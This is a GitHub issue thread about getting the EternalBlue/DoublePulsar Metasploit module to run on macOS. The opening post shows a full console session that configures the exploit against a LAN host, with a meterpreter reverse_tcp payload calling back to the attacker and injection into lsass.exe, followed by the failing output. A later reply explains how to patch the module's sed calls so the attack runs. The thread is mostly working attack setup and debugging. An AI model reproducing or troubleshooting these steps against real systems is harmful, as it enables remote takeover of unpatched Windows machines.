Eternalblue-Doublepulsar-Metasploit icon indicating copy to clipboard operation
Eternalblue-Doublepulsar-Metasploit copied to clipboard

Issues on OSX

Open qt00tp opened this issue 8 years ago • 5 comments

Hi it works on my kali, but gets problem on my OSX. I've changed the path in ruby file, but it still not work.

msf > use exploit/windows/smb/eternalblue_doublepulsar msf exploit(eternalblue_doublepulsar) > set doublepulsarpath /Users/TT/Applications/Eternalblue-Doublepulsar-Metasploit/deps/ doublepulsarpath => /Users/TT/Applications/Eternalblue-Doublepulsar-Metasploit/deps/ msf exploit(eternalblue_doublepulsar) > set eternalbluepath /Users/TT/Applications/Eternalblue-Doublepulsar-Metasploit/deps/ eternalbluepath => /Users/TT/Applications/Eternalblue-Doublepulsar-Metasploit/deps/ msf exploit(eternalblue_doublepulsar) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf exploit(eternalblue_doublepulsar) > set targetarchitecture x64 targetarchitecture => x64 msf exploit(eternalblue_doublepulsar) > set processinject lsass.exe processinject => lsass.exe msf exploit(eternalblue_doublepulsar) > set winepath /Users/TT/.wine/drive_c/ winepath => /Users/TT/.wine/drive_c/ msf exploit(eternalblue_doublepulsar) > msf exploit(eternalblue_doublepulsar) > msf exploit(eternalblue_doublepulsar) > set rhost 192.168.148.13 rhost => 192.168.148.13 msf exploit(eternalblue_doublepulsar) > set lhost 192.168.148.10 lhost => 192.168.148.10 msf exploit(eternalblue_doublepulsar) > run

[] Started reverse TCP handler on 192.168.148.10:4444 [] 192.168.148.13:445 - Generating Eternalblue XML data sed: 1: "/Users/TT/Applications/ ...": invalid command code T sed: 1: "/Users/TT/Applications/ ...": invalid command code T sed: 1: "/Users/TT/Applications/ ...": invalid command code T sed: 1: "/Users/TT/Applications/ ...": invalid command code T [] 192.168.148.13:445 - Generating Doublepulsar XML data sed: 1: "/Users/TT/Applications/ ...": invalid command code T sed: 1: "/Users/TT/Applications/ ...": invalid command code T sed: 1: "/Users/TT/Applications/ ...": invalid command code T sed: 1: "/Users/TT/Applications/ ...": invalid command code T sed: 1: "/Users/TT/Applications/ ...": invalid command code T sed: 1: "/Users/TT/Applications/ ...": invalid command code T [] 192.168.148.13:445 - Generating payload DLL for Doublepulsar [] 192.168.148.13:445 - Writing DLL in /Users/TT/.wine/drive_c/eternal11.dll [] 192.168.148.13:445 - Launching Eternalblue... NetworkTimeout: %TIMEOUT% could not be understood as a S16. TargetIp: %RHOST% is not a valid value. TargetPort: %RPORT% could not be understood as a TcpPort. Target: %TARGET% is not a valid value.

[-] 192.168.148.13:445 - Are you sure it's vulnerable? [*] 192.168.148.13:445 - Launching Doublepulsar... NetworkTimeout: %TIMEOUT% could not be understood as a S16. TargetIp: %RHOST% is not a valid value. TargetPort: %RPORT% could not be understood as a TcpPort. Architecture: %TARGETARCHITECTURE% is not a valid value. DllPayload: %DLLPAY% is not a valid value.

[-] 192.168.148.13:445 - Oops, something was wrong! [*] Exploit completed, but no session was created.

qt00tp avatar Aug 13 '17 16:08 qt00tp

Can you please help me to figure this out ? Thanks.

qt00tp avatar Aug 13 '17 16:08 qt00tp

Same issue here

ghost avatar May 27 '18 20:05 ghost

I also got the same problem how to fix it

Gembeltz avatar Nov 28 '18 08:11 Gembeltz

sed command is a bit different in macos, edit all sed calls into eternalblue_doublepulsar.rb and add an extension after -i argument, example: sed = `sed -i '.bak' 's/%RHOST%/#{datastore['RHOST']}/'

7i11 avatar Dec 30 '18 22:12 7i11

same issue here

androidkillers avatar Mar 20 '22 09:03 androidkillers